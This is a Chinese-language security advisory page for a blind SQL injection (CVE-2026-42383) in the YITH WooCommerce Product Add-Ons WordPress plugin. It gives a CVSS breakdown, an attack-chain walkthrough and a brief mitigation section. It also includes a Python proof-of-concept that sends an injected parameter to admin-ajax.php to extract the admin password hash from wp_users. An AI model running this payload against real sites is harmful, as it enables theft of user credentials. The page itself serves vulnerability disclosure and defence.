CVE-2026-42383 CVSS 7.6 高危

CVE-2026-42383：YITH WooCommerce插件SQL注入漏洞

披露日期: 2026-05-20

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-42383

漏洞类型

SQL注入

CVSS评分

7.6 高危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

YITH WooCommerce Product Add-Ons

漏洞概述

YITH YITH WooCommerce Product Add-Ons插件中存在一个SQL注入漏洞。由于未能正确中和用于SQL命令的特殊元素，拥有高权限的攻击者可以利用该漏洞执行盲注攻击。该漏洞影响了从n/a到4.29.0的版本，可能导致敏感数据泄露，对系统机密性造成严重影响。

技术细节

该漏洞属于SQL注入漏洞的一种，具体表现为盲注。攻击者需要具备高权限（如管理员或店铺经理）才能触发漏洞。在插件的特定功能处理用户输入时，未对数据进行严格的过滤和转义，导致攻击者可以构造恶意的SQL语句片段。由于应用直接拼接SQL查询，攻击者可以通过基于布尔或基于时间的盲注技术，逐位提取数据库中的敏感信息（如用户凭证、订单信息等）。CVSS向量中的S:C表示该漏洞具有更改范围的能力，可能影响同一服务器上的其他组件。

攻击链分析

STEP 1

信息收集

攻击者识别目标网站使用了WordPress以及YITH WooCommerce Product Add-Ons插件，并确认版本在4.29.0及以下。

STEP 2

获取权限

由于漏洞需要高权限（PR:H），攻击者需要通过钓鱼、弱口令猜测或其他方式获取管理员或具备编辑权限的账户凭证。

STEP 3

构造Payload

攻击者针对插件中未过滤的参数构造SQL注入Payload，利用基于布尔或时间的盲注语句。

STEP 4

执行注入

在已登录的高权限会话中，向易受攻击的端点发送包含恶意SQL代码的HTTP请求。

STEP 5

数据窃取

根据服务器的响应差异或响应时间，推断数据库内容，逐步提取用户名、密码哈希等敏感信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# Exploit Title: YITH WooCommerce Product Add-Ons < 4.29.0 - Blind SQL Injection
# Date: 2026-05-20
# Exploit Author: Researcher
# Vendor Homepage: https://yithemes.com/
# Software Link: https://wordpress.org/plugins/yith-woocommerce-product-add-ons/
# Version: <= 4.29.0
# Tested on: WordPress 6.x

import requests
import time

# Configuration
target_url = "http://example.com/wp-admin/admin-ajax.php"
cookie = {
    "wordpress_logged_in_xxx": "your_admin_cookie_here"
}

# Vulnerable parameter example
# The endpoint expects specific addon options, but fails to sanitize input
data = {
    "action": "yith_wapo_get_option_price", 
    "addon_id": "1",
    "index_id": "1 AND (SELECT SUBSTRING(password,1,1) FROM wp_users WHERE ID=1) = '$'"
}

response = requests.post(target_url, data=data, cookies=cookie)

# Analyze response to determine if SQL query was True or False (Blind)
if "valid_response" in response.text:
    print("[+] Payload returned TRUE")
else:
    print("[-] Payload returned FALSE")

# Note: Further automation is required to extract full data character by character.

影响范围

YITH WooCommerce Product Add-Ons <= 4.29.0

防御指南

临时缓解措施

如果无法立即升级，建议在Web应用防火墙（WAF）中部署规则，拦截针对该插件特定端点的异常SQL请求模式。同时，加强对管理员账户的安全监控，防止凭证泄露。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表